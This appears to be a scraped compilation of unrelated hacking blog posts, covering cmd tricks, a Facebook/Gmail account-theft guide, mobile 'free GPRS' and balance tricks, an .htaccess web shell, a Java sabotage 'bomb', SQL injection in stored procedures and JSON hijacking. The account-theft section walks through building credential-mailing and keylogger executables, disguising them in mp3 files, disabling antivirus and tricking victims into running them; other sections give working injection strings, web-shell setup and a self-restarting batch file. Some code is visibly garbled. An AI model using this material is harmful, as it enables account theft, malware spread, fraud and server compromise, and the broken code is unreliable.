Some special tricks from command prompt/cmd if logged in through guest account

(1)If you want to open regedit and cmd when run is disabled and you are logged in as guest, you can use notepad.

open notepad and type and save it as cmd.bat this batch file will open command prompt.
if you cant open regedit by run open notepad type regedit and save it as regedit.bat double click on this and regedit window will open.(2)To abort shutdown ,use notepad
-Open notepad and type shutdown -a and save it as time when your computer is about to shutdown double click on this bat file. for other cmd commands open command prompt and type shutdown a and press enter.

(3)cmd fun virus- open notepad and type shutdown -r 10 and save as restart.bat this will restart your computer in 10 seconds if you want to use this for fun paste this file in system 32 and see. computer will restart in every 10 second.

(4)IP command- open command prompt and type ipconfig/all.
(5)How to know your friend’s ip when chatting on a messenger. suppose you are using g-talk. ask your friend for a good wallpaper you have downloaded. send this to him .Now open your cmd and type Netstat -n


How to hack Facebook accounts for free

How to hack Facebook accounts for free
I brought this post not for misuse or illegal ways of Hacking but to teach my friend how your Facebook account can be hacked, software used in it and what they do to protect their Facebook account
Different Ways to Hack Facebook Account:-
Facebook account can be hack from one of following ways.
1.Facebook Phishing
2.By use of Key logger
3.Facebook Account hack with get control on Primary email address
1.Get access to Primary email address to hack someone’s Facebook account:-
i think hacking victims email address(Primary email address of Facebook) is easier than hacking of Facebook. Most of the users uses gmail or yahoo account email address as as primary email address. A genius hacker can easily gain over victims’ gmail account or yahoo email account.
How to hack Facebook accounts for free
After gaining control over primary email address of facebook, you simply use the  “Forgot password” facility that will ask Facebook to send password reset email to your primary email address- which is already hacked.
Thus, your Facebook account password will be reset and to hack Facebook account you already have another alternative as well.
Hacking Facebook Account Password using Free Emissary Keylogger:-
For this you have to fill two requirement1.hack G mail.This you either by the step provided above or by downloading:-Link to download- G mail hacker


Follow the Step to hack Gmail Account Password:-
Step 1: Download ‘Gmail hacker‘ Software (extract the file to desktop). If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Gmail hacker Bulder.exe’ file and enter your gmail account details, so that the password of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one fake account and enter those details.
Step 3: After you enter your ‘Gmail account’ details Click on ‘Build’. Now the Gmail Hacker will Clone itself, ie it will create another file called ‘Gmail Hacker.exe’ and will save it in the same folder.
Step 4: Now Send the ‘Gmail Hacker.exe’ file that you just created to your Victim Via email or Upload it to any File sharing website for eg:, Rapidshare, etc and send the link via chat or email.
Ask the Victim to try that software to hack others email and some how convince him to run that software and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he want to hack).
When he enters the required information and hits the ‘hack them’ Button, he will receive an error message as shown below and The Username and Password will be mailed to your Gmail Id (that you Specified in Step 2)
Note: you Should Provide a valid USERNAME and PASSWORD, in order to receive the hacked details


 2.This Trick requires you to have ‘Microsoft’s .net Framework‘, if you don’t have please download and install it.Link to
Hacking Facebook Account Password using Free Emissary Keylogger;-
How to hack Facebook accounts for free
Step 1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Emissary.exe’ file and enter your gmail account details,  so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details.
How to hack Facebook accounts for free
Step 3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account.  In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field.
Step4: Now after filling the required fields, Click ‘Build’ button. This will create another file called server.exe in the same directory.
How to hack Facebook accounts for free
Step5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge. also read: How to change ICON of .exe file?
 Now because this is a free keylogger, you can’t send server.exe file via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, rapidshare, filethief etc.
 How to hack Facebook accounts for free
Step6: Once the victim runs your sent keylogger file on his computer, it searches for all the stored usernames and passwords and it will send you email containing all keylogs and screenshots regularly after the specified ‘Time interval’.

Mobile gprs and Balance Hacking Tips and tricks

1.Mobile balance hacking:-
To download this software from your mobile open website on your mobile and enter 13057 WAP code
FREE GPRS: Airtel Mobile Hack:-
link for free mobile balance hacking software:-  Click to Download

Idea Balance Transfering Trick
: Dial
*567*(Mobile No.)*(Transfer Balance)#
Then Press Call Button

3.How to activate Airtel free gprs:-

airtel free gprs hacking
1) Activate Airtel Live

2)Create TWO Airtel GPRS data accounts  and select the
FIRST as the active profile.

3) Connect your mobile to the PC  or Laptop and install the driver for
your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device :  Your mobile’s modem
ISP Name :  Airtel or anything you like
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy and port 8080.

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!).

8 ) On the PC or Laptop open your browser, enter any address ,
press ENTER and…….WAIT

9) After a few seconds the page will start to load and you will be able to acess free Gprs.

Advice:-My advice is to use Opera since you can browse both wap and regular websites




Attacking webservers via .htaccess

A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn’t help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc).

This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn’t get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the tags are presented as is.

# Self contained .htaccess web shell – Part of the htshell project
# Written by Wireghoul –

# Override default deny rule to make .htaccess file accessible over web

Order allow,deny
Allow from all

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### &1″); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the urlhttp://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.

Disgruntled Bomb: Java Edition

A little while back, we had a Bring Your own Code called The Disgruntled Bomb that sought to answer, “what is the worst thing a disgruntled employee could leave behind in the source code?”

The comments were great and featured all sorts of solutions. Most were in C and C++, but there were few unique ones like a cronjob and even an incredible one-liner for .NET.

While C and C++ give programmers enough rope to shoot themselves (or build a crazy bomb), managed platforms like .NET and Java limit your options. That is, unless you know where to look. Alexander Keul took advantage of Java’s cached boxing conversions to come up with this concept:

package dont.try_this.at_home;
import java.lang.*;

class ValueMunger extends Thread {
public void run() {
while(true) {
try { sleep(1000); } catch (Throwable t) { }

public void munge() {
try {
Field field = Integer.class.getDeclaredField( “value” );
field.setAccessible( true );
for(int i = -127; i<=128; i++)
// either the same (90%), +1 (10%), or 42 (1%)
Math.random() < 0.9 ? i : Math.random() < 0.1 ? 42 : i+1 );
} catch (Throwable t) { ; }


A simple call to (new ValueMunger()).start(); will spin off a new thread that will randomly redefines the values of integers between -127 and 128, ensuring that maths will never be the same again:

Integer a = 2;
Integer b = 3;

System.out.println( a + b ); // could be 5, 6, 7, 44, 45, or 84

To extend the fun, this works for Boolean and several other primative types like BigInteger, Long, Short, etc.

SQL Injections In Stored Procedures

In this post I’ll discuss how SQL injection in stored procedures could be exploited in Microsoft SQL Server, Oracle, Sybase ASE databases.

SQL injection is an attack that allows an unprivileged user to execute SQL code with elevated privileges due to a bug in the input sanitation used in dynamic SQL execution. There are two types of SQL injection:

A user having no access to the database may inject and execute SQL via some application.
A user having access to the database can elevate privileges by exploiting SQL injection in stored procedures owned by privileged users. This includes exploiting bugs in vendor-provided stored procedures.

Microsoft SQL Server 2008

A simple example of exploiting SQL injection in stored procedures in Microsoft SQL Server 2008 would be a stored procedure that accepts a string parameter and then uses it without sanitation to build and execute a query. If such a procedure is granted to “execute to public” it can lead to code execution in the context of the procedure owner. Look at the following code for Microsoft SQL Server 2008:

@ids sysname
EXEC(N’SELECT name FROM sysobjects WHERE id IN (‘+ @ids + N’)’)

GRANT EXECUTE ON usp_demo TO public

This procedure is supposed to return names of objects which IDs are in the list provided by the caller. Note the EXECUTE AS clause that allows “public” to query the sysobjects table. The problem with this procedure is that it does not sanitize the user input, which is the @ids value in this case. If the parameter value contains single quotes then the query logic could be altered:

— Legitimate invocation
EXECUTE usp_demo N’3,4,5′
— Invocation with SQL injection
EXECUTE usp_demo N’3,4,5) UNION ALL (SELECT name FROM sys.sql_logins’

A list of names is now combined with a list of SQL logins from sys.sql_logins view which allows “public” to collect sensitive information that was previously unavailable. If done by an unprivileged user it returns fewer rows than comes from the stored procedure invocation with injection. If an unprivileged user calls SELECT from sys.sql_logins it would return less rows than calling it using SQL injection through the stored procedure.

In previous versions (Microsoft SQL Server 2000 and earlier), dynamic SQL executed under the context of the caller. Microsoft SQL Server 2005 and newer versions support specifying and explicit execution context which allows more granular control over code execution. Adding to the complexity of the task, with explicitly specifying the execution context, dynamic SQL that is vulnerable to SQL injection may cause more harm.
Notable example of SQL injection in Microsoft SQL Server

Microsoft SQL Server 2000 prior to service pack 3 contained stored procedure sp_MSdropretry which was publicly executable. This procedure’s code looks like this:

CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname sysname)
declare @retcode int
** To public

exec (‘drop table ‘ + @tname)
if @@ERROR 0 return(1)
exec (‘drop procedure ‘ + @pname)
if @@ERROR 0 return(1)
return (0)

Note that the @tname parameter passed to the EXEC is not sanitated. This allows to exploit the injection by the db_owner user in any database:

exec sp_executeSQL N’create view dbo.test as select * from master.dbo.sysxlogins’
exec sp_msdropretry ‘anything update dbo.test set xstatus=18 where name= SUSER_SNAME()’, ‘anything’
exec sp_executeSQL N’drop view dbo.test’
Oracle 11g

In Oracle, procedures are usually grouped into packages and then permissions are granted at the package level. If a procedure is not declared in the package definition, then it is considered internal to the package and cannot be called from outside the package. Procedures in Oracle can run under definer or caller rights. For SQL injection to be useful, the procedure must be created with definer, not caller rights (AUTHID DEFINER).
Here is an example of a simple procedure that is similar to the previously referenced Microsoft SQL Server example:

CREATE OR REPLACE PROCEDURE usp_demo (p_ids IN varchar2)
v_count NUMBER;
DBMS_OUTPUT.PUT_LINE(‘Matching records: ‘ || v_count);


Assuming the above code was run by the SYS user, any user can now invoke the usp_demo procedure and get some results back:

— Legitimate invocation example
sys.usp_demo(’10, 11′);

Now this can be exploited to invoke the user-provided function which can be used to perform malicious acts in the context of SYS user:

sys.usp_demo(’10) AND AND OBJECT_ID IN(11’);

This exploit requires that the malicious user can create a function: depending on particular query in vulnerable procedure it might be needed or not. Example function:

v_cnt NUMBER;
DBMS_OUTPUT.PUT_LINE(‘Privileges count: ‘ || v_cnt);

Note the difference when AUTHID in the function definition is replaced with DEFINER. The privilege count dramatically drops because the function is not running with SYS rights in that case.

One fundamental difference between Microsoft SQL Server and Oracle dynamic query execution is that in Oracle, it is impossible to comment out the remaining part of the query with double dash or some other sequence – making exploiting some injections more complex.

The remediation steps are to validate input before passing it to the execution and using parametrized queries if possible.
Notable example of SQL injection in Oracle Database

Unpatched Oracle 10g R1 contains procedure SYS.kupw$WORKER.main which is vulnerable to SQL injection via specially created function:

exec sys.kupw$WORKER.main(‘x’,’YY” and 1=d.f — r6′);

where f is a function created by attacker:

authid current_user as
pragma autonomous_transaction;
Sybase ASE 15

Sybase ASE is just slightly different in stored procedure execution. A procedure may have the “Dynamic Ownership Chain” option set. In this case (non-default) permissions on objects accessed from dynamic SQL inside the procedure are checked against the procedure creator, not the invoker.

@ids varchar(200)
EXECUTE(‘SELECT name FROM sysobjects WHERE id IN (‘ + @ids + ‘)’)

EXECUTE sp_procxmode ‘usp_demo’, ‘dynamic’

GRANT EXECUTE ON usp_demo TO public

Now any user can execute this procedure and collect password hashes:

EXECUTE usp_demo ‘1,2) UNION ALL (SELECT password FROM syslogins’

Since the dynamic mode isn’t the default setting, the scope of the problem is reduced. However, input should still be validated before execution.


EXECUTE AS Clause (Transact-SQL)

Using Invoker’s Rights or Definer’s Rights (AUTHID Clause)

Reference Manual: System Procedures: sp_procxmode

SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1

JSON Hijacking

There isn’t a lot of information about JSON hijacking out there at the minute, I will aim to provide a “news update” on the state of publicly known techniques. First off I will give a quick overview of how JSON data can be stolen and explain how JavaScript reads JSON.
JavaScript’s quirky nature

There is a little quirk in how JavaScript reads objects, it is a syntax oversight. When a “{” is first encountered if no other statement appeared before or it does not occur inside another object then the code is treated as a block statement. A block statement is simply a collection of one or more JavaScript statements inside a block of curly braces. Here is an example of a block statement:

{1+1,alert(‘I am a block statement’)}

You might have seen code like the following when related to JSON:


Notice the beginning and ending parenthesis, this is to force JavaScript to execute the data as an object not a block statement mentioned above. If JavaScript did attempt to execute JSON data without the parenthesis and the JSON data did in fact begin with “{” then a syntax error would occur because the block statement would be invalid. To the eval statement the JSON data would look like this:


Because the “{” begins the data it is in block statement mode and the “name” part is treated as a string literal when the colon is encountered it raises a syntax error because a colon cannot occur after a String unless it’s part of a ternary statement. Hopefully now you’ll see why some code uses eval with enclosing parenthesis, I’d like to mention that using eval directly on JSON data is bad practice, you are far better validating the data first or using the browser’s native JSON objects to read the data but it illustrates my point well for understanding how the JSON data is parsed.

The question is what sort of code would execute a object literal when JSON data is encountered? The most common scenario is when the data is placed inside an array literal, if you remembered from my previous explanation ” When a “{” is first encountered if no other statement appeared before or it does not occur inside another object then the code is treated as a block statement. ” so the following are valid object literal statements:

1,{“I am an object”:”Literal”}
~{“I am an object”:”Literal”}
1+{“I am an object”:”Literal”}
[{“I am an object”:”Literal”}]

The last example we’re most interested in because many sites use this form of JSON structure. Notice that no variable is assigned for the array literal and the JSON data is executed directly to obtain its contents, but how would you steal this data cross-domain?
Array constructor clobbering

You now know what sort of JSON structure you’re looking for, in the past in Firefox it was possible to clobber the array constructor [1]. This means we could overwrite the array behaviour before the JSON data was read. Then because we had control over the array we could read the data before it was sent. It looked like this:

function Array() {
for(var i=0;i alert(arguments[i]);//contains each friend object

//JSON DATA CONTAINS: [{“friend1″:”Test1”},{“friend2″:”Test2”}]

As you can see this is how the data was stolen, each object was passed to our function via the arguments then you could read the data from an external inclusion of the data. Unfortunately/ fortunately depending on your perspective this was fixed in Firefox by not calling the constructor for array literals. Note that this is a non-standard fix for security sake. Other browsers still implement that functionality. We can still demonstrate the past attack though by using the Array constructor directly so you can see how it worked in the past:

function Array() {
for(var i=0;i for(var j in arguments[i]) {
Object prototype setters

What works now? Well we can still conduct the same attack using another method, in Firefox this method is now fixed due to my demonstration of a Twitter privacy issue [2][3]. However many other browsers including Chrome, Opera and Safari still allow this attack (They don’t consider it a flaw). In order to understand the attack you need to understand how setters work. Setters are called when a object’s data is attempted to be modified. If you try the following example in Firefox, Chrome, Opera or Safari you will see how they work:

window.__defineSetter__(‘x’, function() {
alert(‘x is being assigned!’);

The example should alert “x is being assigned!”. The _defineSetter_ is a special method that allows you to attach a setter to an object. The first argument is the name of your setter in this case “x” and the second argument is the function you wish to call, the object is taken from whichever object you called the_defineSetter_ method.
Now you know how they work you can now use this technique to steal JSON data by applying it to the Object prototype. The Object prototype is a Object that every other object inherits from in JavaScript, if you create a setter on the name of your target JSON data then you can get the value of the data. This time I’ll show you a real world attack on Twitter that was fixed. My original article was called “I Know what your friends did last summer” [4] it was a play on the really bad horror films and the fact you could know who your friends are on twitter and basically what they were doing and where. Joe Walker also discovered this technique separately [5]

The first part of the script uses _defineSetter_ on the object prototype and uses “user” as a property, Twitter used the “user” property to store an object about the user in the JSON data. The script then loops through the object and reads the data about the user which would be name,email, location etc. The second part actually includes the twitter JSON feed.
New attacks

If you have partial control over some of the JSON data it’s possible to steal the data by manipulating it using UTF-7. For example if you control the “email” field of the JSON data you could encode it in such a way that when it’s included it exposes the rest of the data.


You can then include the JSON data using a script tag with the UTF-7 charset which converts the +- encoded string to:

[{‘friend’:’luke’,’email’:”}];alert(‘May the force be with you’);[{‘job’:’done’}]

Our email field is being closed and manipulated so we can inject our own JavaScript, this way we could steal the data by using timeouts or function calls on the array data. The user “luoluo” from a comment on my blog provides a good example:

[{‘friend’:’luke’,’email’:”}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + “:” + x[o]);
setTimeout(function() {
var x = data[0];
for (var o in x) {
alert(o + “:” + x[o]);
}, 100);var data=[{‘job’:’done’}];
ES5 functionality

If _defineSetter_ is not available there is a standards based alternative that may allow JSON stealing to continue. Using the defineProperty or defineProperties methods of the Object you could conduct a similar attack which varies in syntax only slightly.

Object.defineProperty(window,’x’,{set: function() {
alert(‘x is being assigned!’);

As you can see the syntax is very similar, this time however we use window.Object to call the method and specify the Object we wish to create the setter on in the first argument, the second argument is the name of our property and the third argument takes a object literal to define the setter. This can also be applied to the Object prototype by replacing “window” with Object.prototype thus re-creating the object prototype attack mentioned earlier.

Object.defineProperty(Object.prototype, ‘user’, {
set:function(obj) {
for(var i in obj) {
alert(i + ‘=’ + obj[i]);

If you are pen testing JSON feeds make sure the web site in question prevents external inclusion of the data via script or even better recommend the site does not expose the data publicly if privacy will be compromised. Twitter solved the information disclosure problem by requiring authentication for its JSON and other feeds consider doing the same if the data has to be exposed.
The flaws mentioned in this article exploit design level bugs in how Object literals & array constructors are handled, some browser vendors do not consider them flaws as such, I have to disagree.
The root of the problem is external script inclusion across domains which unfortunately isn’t going to go away any time soon due to the design of the web, we can lock down features in way that they do not compromise privacy, do we really need setters on the Object prototype? If they are required why not place some restrictions on how they can be applied across domains. I understand the vendor’s point of view, technically they are not flaws they are features and in a perfect world they would be used in the correct way and web sites would generate well formed JSON feeds but this isn’t a perfect world and web developers make assumptions about their data. I recommend vendors follow the developer’s assumptions and prevent these types of attacks by locking down the functionality so it can’t be exploited. Developer assumptions create security holes.

[1] Joe Walker
[2] Jeremiah Grossman
[3] Mozilla security
[5] Joe Walker